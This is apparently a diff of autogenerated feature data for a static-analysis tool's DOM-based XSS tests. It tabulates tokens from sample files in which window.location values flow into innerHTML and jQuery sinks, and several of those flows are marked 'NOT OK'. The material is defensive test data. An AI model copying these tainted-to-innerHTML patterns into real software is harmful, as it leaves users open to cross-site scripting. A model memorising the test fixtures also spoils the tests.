autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:30:87:33 | from | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:30:87:33 | from | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:30:87:33 | from | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:30:87:33 | from | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:30:87:33 | from | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:35:87:43 | dropItems | CalleeFlexibleAccessPath | Array.from | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:35:87:43 | dropItems | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:35:87:43 | dropItems | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13660,12 +101456,106 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:35:87:43 | dropItems | enclosingFunctionName | getDropData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:35:87:43 | dropItems | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:35:87:43 | dropItems | receiverName | Array | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:88:12:88:21 | imageItems | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:88:12:88:21 | imageItems | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:88:12:88:21 | imageItems | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:88:12:88:21 | imageItems | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:88:12:88:21 | imageItems | fileImports | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:1:0 | this | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:1:0 | this | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:1:0 | this | enclosingFunctionBody | loc window location href $ click | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:1:0 | this | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:4:1 | 'arguments' object of function test | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:4:1 | 'arguments' object of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:4:1 | 'arguments' object of function test | enclosingFunctionBody | loc window location href $ click | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:4:1 | 'arguments' object of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:4:1 | 'arguments' object of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:4:1 | exceptional return of function test | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:4:1 | exceptional return of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:4:1 | exceptional return of function test | enclosingFunctionBody | loc window location href $ click | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:4:1 | exceptional return of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:4:1 | exceptional return of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:4:1 | functio ... // OK\\n} | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:4:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:4:1 | functio ... // OK\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:4:1 | return of function test | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:4:1 | return of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:4:1 | return of function test | enclosingFunctionBody | loc window location href $ click | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:4:1 | return of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:1:4:1 | return of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:10:1:13 | test | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:10:1:13 | test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/encodeuri.js:1:10:1:13 | test | fileImports | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:7:2:9 | loc | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:7:2:9 | loc | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:7:2:9 | loc | enclosingFunctionBody | loc window location href $ click | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:7:2:9 | loc | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:7:2:9 | loc | fileImports | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:7:2:32 | loc | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:7:2:32 | loc | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:7:2:32 | loc | enclosingFunctionBody | loc window location href $ click | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:7:2:32 | loc | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:7:2:32 | loc | fileImports | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:7:2:32 | loc = w ... on.href | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:7:2:32 | loc = w ... on.href | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:7:2:32 | loc = w ... on.href | enclosingFunctionBody | loc window location href $ click | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:7:2:32 | loc = w ... on.href | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:7:2:32 | loc = w ... on.href | fileImports | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:13:2:18 | window | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:13:2:18 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:13:2:18 | window | enclosingFunctionBody | loc window location href $ click | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:13:2:18 | window | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:13:2:18 | window | fileImports | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:13:2:27 | window.location | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:13:2:27 | window.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:13:2:27 | window.location | enclosingFunctionBody | loc window location href $ click | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:13:2:27 | window.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:13:2:27 | window.location | fileImports | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:13:2:32 | window.location.href | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:13:2:32 | window.location.href | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:13:2:32 | window.location.href | enclosingFunctionBody | loc window location href $ click | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:13:2:32 | window.location.href | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:13:2:32 | window.location.href | fileImports | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:20:2:27 | location | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:20:2:27 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:20:2:27 | location | enclosingFunctionBody | loc window location href $ click | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:20:2:27 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:20:2:27 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:29:2:32 | href | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:29:2:32 | href | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:29:2:32 | href | enclosingFunctionBody | loc window location href $ click | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:29:2:32 | href | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/encodeuri.js:2:29:2:32 | href | fileImports | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:3:3:3 | $ | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:3:3:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:3:3:3 | $ | enclosingFunctionBody | loc window location href $ click | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:3:3:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:3:3:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:3:3:58 | $('') | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:3:3:58 | $('') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:3:3:58 | $('') | enclosingFunctionBody | loc window location href $ click | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:3:3:58 | $('') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:3:3:58 | $('') | fileImports | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:3:3:58 | exceptional return of $('') | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:3:3:58 | exceptional return of $('') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:3:3:58 | exceptional return of $('') | enclosingFunctionBody | loc window location href $ click | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:3:3:58 | exceptional return of $('') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:3:3:58 | exceptional return of $('') | fileImports | | | autogenerated/Xss/DomBasedXss/encodeuri.js:3:5:3:15 | 'click | | autogenerated/Xss/DomBasedXss/encodeuri.js:3:5:3:15 | 'click' | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:5:3:41 | 'click | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:5:3:41 | '' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/encodeuri.js:3:5:3:57 | '' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/encodeuri.js:3:5:3:57 | '' | contextFunctionInterfaces | test() | @@ -13673,12 +101563,22 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/encodeuri.js:3:5:3:57 | '' | enclosingFunctionBody | loc window location href $ click | | autogenerated/Xss/DomBasedXss/encodeuri.js:3:5:3:57 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/encodeuri.js:3:5:3:57 | '' | fileImports | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:19:3:36 | encodeURIComponent | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:19:3:36 | encodeURIComponent | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:19:3:36 | encodeURIComponent | enclosingFunctionBody | loc window location href $ click | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:19:3:36 | encodeURIComponent | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:19:3:36 | encodeURIComponent | fileImports | | | autogenerated/Xss/DomBasedXss/encodeuri.js:3:19:3:41 | encodeU ... nt(loc) | contextFunctionInterfaces | test() | | autogenerated/Xss/DomBasedXss/encodeuri.js:3:19:3:41 | encodeU ... nt(loc) | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/encodeuri.js:3:19:3:41 | encodeU ... nt(loc) | enclosingFunctionBody | loc window location href $ click | | autogenerated/Xss/DomBasedXss/encodeuri.js:3:19:3:41 | encodeU ... nt(loc) | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/encodeuri.js:3:19:3:41 | encodeU ... nt(loc) | fileImports | | | autogenerated/Xss/DomBasedXss/encodeuri.js:3:19:3:41 | encodeU ... nt(loc) | stringConcatenatedWith | 'click' | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:19:3:41 | exceptional return of encodeU ... nt(loc) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:19:3:41 | exceptional return of encodeU ... nt(loc) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:19:3:41 | exceptional return of encodeU ... nt(loc) | enclosingFunctionBody | loc window location href $ click | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:19:3:41 | exceptional return of encodeU ... nt(loc) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/encodeuri.js:3:19:3:41 | exceptional return of encodeU ... nt(loc) | fileImports | | | autogenerated/Xss/DomBasedXss/encodeuri.js:3:38:3:40 | loc | CalleeFlexibleAccessPath | encodeURIComponent | | autogenerated/Xss/DomBasedXss/encodeuri.js:3:38:3:40 | loc | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/encodeuri.js:3:38:3:40 | loc | contextFunctionInterfaces | test() | @@ -13692,42 +101592,217 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/encodeuri.js:3:45:3:57 | '">click' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/encodeuri.js:3:45:3:57 | '">click' | fileImports | | | autogenerated/Xss/DomBasedXss/encodeuri.js:3:45:3:57 | '">click' | stringConcatenatedWith | 'A link | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:1:43 | this | enclosingFunctionName | onclick | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:1:43 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:3:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | onclick() | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:3:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:3:1 | 'arguments' object of anonymous function | enclosingFunctionBody | parentNode innerHTML

    A link

    | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:3:1 | 'arguments' object of anonymous function | enclosingFunctionName | onclick | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:3:1 | 'arguments' object of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:3:1 | exceptional return of anonymous function | contextFunctionInterfaces | onclick() | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:3:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:3:1 | exceptional return of anonymous function | enclosingFunctionBody | parentNode innerHTML

    A link

    | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:3:1 | exceptional return of anonymous function | enclosingFunctionName | onclick | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:3:1 | exceptional return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:3:1 | functio ... OT OK\\n} | assignedToPropName | onclick | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:3:1 | functio ... OT OK\\n} | contextFunctionInterfaces | onclick() | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:3:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:3:1 | functio ... OT OK\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:3:1 | return of anonymous function | contextFunctionInterfaces | onclick() | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:3:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:3:1 | return of anonymous function | enclosingFunctionBody | parentNode innerHTML

    A link

    | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:3:1 | return of anonymous function | enclosingFunctionName | onclick | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:1:44:3:1 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:3:2:6 | this | contextFunctionInterfaces | onclick() | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:3:2:6 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:3:2:6 | this | enclosingFunctionBody | parentNode innerHTML

    A link

    | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:3:2:6 | this | enclosingFunctionName | onclick | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:3:2:6 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:3:2:17 | this.parentNode | contextFunctionInterfaces | onclick() | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:3:2:17 | this.parentNode | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:3:2:17 | this.parentNode | enclosingFunctionBody | parentNode innerHTML

    A link

    | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:3:2:17 | this.parentNode | enclosingFunctionName | onclick | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:3:2:17 | this.parentNode | fileImports | | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:3:2:27 | this.pa ... nerHTML | contextFunctionInterfaces | onclick() | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:3:2:27 | this.pa ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:3:2:27 | this.pa ... nerHTML | enclosingFunctionBody | parentNode innerHTML

    A link

    | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:3:2:27 | this.pa ... nerHTML | enclosingFunctionName | onclick | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:3:2:27 | this.pa ... nerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:3:2:83 | this.pa ... >' | contextFunctionInterfaces | onclick() | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:3:2:83 | this.pa ... >' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:3:2:83 | this.pa ... >' | enclosingFunctionBody | parentNode innerHTML

    A link

    | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:3:2:83 | this.pa ... >' | enclosingFunctionName | onclick | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:3:2:83 | this.pa ... >' | fileImports | | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:8:2:17 | parentNode | contextFunctionInterfaces | onclick() | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:8:2:17 | parentNode | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:8:2:17 | parentNode | enclosingFunctionBody | parentNode innerHTML

    A link

    | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:8:2:17 | parentNode | enclosingFunctionName | onclick | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:8:2:17 | parentNode | fileImports | | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:19:2:27 | innerHTML | contextFunctionInterfaces | onclick() | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:19:2:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:19:2:27 | innerHTML | enclosingFunctionBody | parentNode innerHTML

    A link

    | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:19:2:27 | innerHTML | enclosingFunctionName | onclick | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:19:2:27 | innerHTML | fileImports | | | autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:31:2:45 | '

    A link

    | | autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:31:2:45 | '

    A link

    ' | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:31:2:61 | '

    A link

    | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:31:2:61 | '

    ' | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:31:2:83 | '

    ' | contextFunctionInterfaces | onclick() | | autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:31:2:83 | '

    ' | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:31:2:83 | '

    ' | enclosingFunctionBody | parentNode innerHTML

    A link

    | | autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:31:2:83 | '

    ' | enclosingFunctionName | onclick | | autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:31:2:83 | '

    ' | fileImports | | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:49:2:56 | location | contextFunctionInterfaces | onclick() | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:49:2:56 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:49:2:56 | location | enclosingFunctionBody | parentNode innerHTML

    A link

    | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:49:2:56 | location | enclosingFunctionName | onclick | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:49:2:56 | location | fileImports | | | autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:49:2:61 | location.href | contextFunctionInterfaces | onclick() | | autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:49:2:61 | location.href | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:49:2:61 | location.href | enclosingFunctionBody | parentNode innerHTML

    A link

    | | autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:49:2:61 | location.href | enclosingFunctionName | onclick | | autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:49:2:61 | location.href | fileImports | | | autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:49:2:61 | location.href | stringConcatenatedWith | '

    A link

    ' | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:58:2:61 | href | contextFunctionInterfaces | onclick() | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:58:2:61 | href | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:58:2:61 | href | enclosingFunctionBody | parentNode innerHTML

    A link

    | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:58:2:61 | href | enclosingFunctionName | onclick | +| autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:58:2:61 | href | fileImports | | | autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:65:2:83 | '">A link' | contextFunctionInterfaces | onclick() | | autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:65:2:83 | '">A link' | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:65:2:83 | '">A link' | enclosingFunctionBody | parentNode innerHTML

    A link

    | | autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:65:2:83 | '">A link' | enclosingFunctionName | onclick | | autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:65:2:83 | '">A link' | fileImports | | | autogenerated/Xss/DomBasedXss/event-handler-receiver.js:2:65:2:83 | '">A link' | stringConcatenatedWith | '

    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:1:0 | this | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:35:1 | 'arguments' object of function test | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:35:1 | 'arguments' object of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:35:1 | 'arguments' object of function test | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:35:1 | 'arguments' object of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:35:1 | 'arguments' object of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:35:1 | exceptional return of function test | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:35:1 | exceptional return of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:35:1 | exceptional return of function test | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:35:1 | exceptional return of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:35:1 | exceptional return of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:35:1 | functio ... OT OK\\n} | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:35:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:35:1 | functio ... OT OK\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:35:1 | return of function test | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:35:1 | return of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:35:1 | return of function test | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
